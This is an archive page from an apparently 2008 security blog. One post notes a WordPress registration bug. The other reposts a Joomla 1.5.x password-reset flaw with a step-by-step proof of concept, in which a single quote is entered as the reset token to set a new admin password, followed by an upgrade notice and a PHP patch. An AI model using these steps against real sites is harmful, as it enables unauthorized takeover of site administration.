Bug | Mr Am's SySteM

Archive for the 'Bug' Category

New registration disabled

September 8th, 2008

New bug for wordpress.. Damn.

There is no patch yet.. So, to be save, I was disabled registration to my blog..

Bug : HERE

Suggestion FIX : disable user registration

NOTE - This is not a serious bug, cause the new pass will be sent to correct admin, not to hacker

updated : bug fix after upgrade to 2.6.2

Posted by Mr Am | Filed in BLOG, Bug, Wordpress | 1 Comment »

Joomla 1.5.x Remote Admin Password Change

August 14th, 2008

####################################################
#### Joomla 1.5.x Remote Admin Password Change ####
####################################################

Bug : http://www.milw0rm.com/exploits/6234
Patch : click here
POC :

1. Go to url : www.target.com/index.php?option=com_user&view=reset&layout=confirm
2. Write into field “token” char ‘ and Click OK.
3. Write new password for admin
4. Go to url : www.target.com/administrator/
5. Login admin with new password

Upgrade to latest Joomla! version (1.5.6 or newer)

Add the following code to global $mainframe; on line 113 of reset.php

[sourcecode language='php']

if(strlen($token) != 32) {
$this->setError(JText::_(’INVALID_TOKEN’));
return false;

}

[/sourcecode]

Posted by Mr Am | Filed in Bug, Hacker, Network Security, hacking | 2 Comments »

IM Online

User Online
- 4 Users Online
- Users: 4 Guests

Pagerank Checker

Technorati rank Technorati inblogs(authority) Technorati inlinks Technorati last update Google pagerank Alexa popularity Alexa backlink Google backlink Yahoo inlink Google indexed Yahoo indexed MSN indexed AllTheWeb result Altavista result Exactrank Googlebot last access Blogworth Listed in DMOZ or not ?
CLICK HERE